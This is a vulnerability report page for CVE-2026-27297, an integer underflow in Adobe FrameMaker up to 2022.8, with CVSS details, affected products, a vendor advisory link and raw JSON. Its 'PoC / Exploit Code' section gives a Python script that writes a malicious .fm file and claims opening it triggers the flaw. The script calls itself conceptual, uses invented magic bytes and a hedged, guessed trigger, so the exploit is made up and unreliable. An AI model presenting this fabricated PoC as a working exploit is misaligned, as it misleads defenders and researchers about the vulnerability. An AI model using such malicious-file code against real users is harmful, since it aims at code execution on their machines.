Security Vulnerability Report
CVE-2026-27297 CVSS 7.8 HIGH

CVE-2026-27297

Published: 2026-04-14 23:16:27
Last Modified: 2026-04-15 17:37:19

Description

Adobe Framemaker versions 2022.8 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Adobe Framemaker <= 2022.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct

# Conceptual PoC for Integer Underflow in Adobe Framemaker
# This script generates a file with a malicious header designed to trigger an underflow.

def create_malicious_file(filename):
    with open(filename, 'wb') as f:
        # Write a file signature or magic bytes to mimic a valid Framemaker file
        f.write(b'FM_DOC')

        # Write a malicious integer value.
        # If the application subtracts a value (e.g., 0x10) from this field
        # without checking if it's less than 0x10, an integer underflow occurs.
        # This leads to memory corruption.
        malicious_int = 0x00000001
        f.write(struct.pack('<I', malicious_int))

        # Add padding to fill the buffer structure
        f.write(b'A' * 256)

    print(f"[+] Malicious file generated: {filename}")
    print(f"[+] Open this file in Adobe Framemaker <= 2022.8 to trigger the vulnerability.")

if __name__ == "__main__":
    create_malicious_file("cve_2026_27297_poc.fm")

References

https://helpx.adobe.com/security/products/framemaker/apsb26-36.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27297", "sourceIdentifier": "[email protected]", "published": "2026-04-14T23:16:26.770", "lastModified": "2026-04-15T17:37:19.157", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Framemaker versions 2022.8 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-191"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:*", "versionEndExcluding": "2022.9", "matchCriteriaId": "6943B816-3A7D-47BF-9E01-DF86C9332C19"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/framemaker/apsb26-36.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}